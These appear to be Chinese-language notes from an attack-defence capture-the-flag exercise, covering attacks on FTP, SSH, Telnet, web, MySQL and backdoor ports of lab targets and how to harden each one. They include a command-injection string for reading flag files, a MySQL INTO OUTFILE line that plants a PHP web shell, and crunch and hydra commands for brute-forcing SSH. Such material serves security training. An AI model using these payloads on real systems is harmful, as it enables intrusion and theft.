1. 信息收集，使用kali，扫描己方靶机端口

1. 21端口的ftp的攻击

ftp攻击方式，查看本机有哪些普通用户

 

admin/123456和guest/123456

 

 

 

 

然后提交flag

 

1. 22端口的ssh攻击

 

 

 

 

使用session –I 查看已经获取到的连接

 

使用session –I 序号 获取连接

 

 

1. 23 telnet的攻击方式

 

 

 

1. 防御21-23端口的攻击

1. 改密码

 

1. 或者删除500以上的用户

.

 

 

1. 80http的攻击方法

进入自己的网站根目录

 

DisplayDirectory.php

 

此页面用来查看文件夹内的内容

 

 

使用&&加上cat /root/flagvalue.txt查看别人的flag，然后通过修改url，可以快速拿分

 

加固

 

 

 

 

 

 

FileSharing.php  文件上传漏洞

 

Kali生成木马

 

 

找到存储木马的路径

 

 

木马路径

 

使用工具连接

 

加固

 

 

 

 

WebShell.php

 

 

加固

 

 

 

通过查看TestConn.php页面可获知数据库密码为root/root

 

1. 3306数据库攻击方式，使用kali远程连接别人的数据库

 

攻击代码

select '<?php system($_GET['a']); ?>' INTO OUTFILE '/var/www/html/a.php';

 

攻击

 

加固漏洞

        >use mysql;

>update user set Password=password('123456') where User='root';

 

修改密码即可

 

1. 攻击10000以后的大端口后门

 

 

加固

写centos的iptables,关闭防火墙

 

清除防火墙预设规则

 

设置默认规则，拒绝所有进来的流量

 

设置默认规则，拒绝所有转发流量

 

设置默认规则，允许所有出去的流量

 

允许21,22,23,80,3306

 

保存防火墙规则

 

启动防火墙

 

查看结果

攻防对抗2

1. 扫描

 

1. 制作字典跑密码

crunch 6 6 -t 0000%%  > /passw

 

开始破解自己的密码

hydra -l root -P /passw -t 4 ssh://172.16.120.250

 

现在使用putty进去到自己的靶机

 

1. 21-23端口攻击方法一致
2. 80端口攻击

生成字典

 

调出网站后台破解工具

 

 

 

 

得出网站后台

1. 3306与上文一致
2. 大端口修改

攻击方法一致

加固方法需要谨慎

法1：shell脚本一次成型

 

 

 

 

法2：把防火墙规则写在防火墙配置文件里面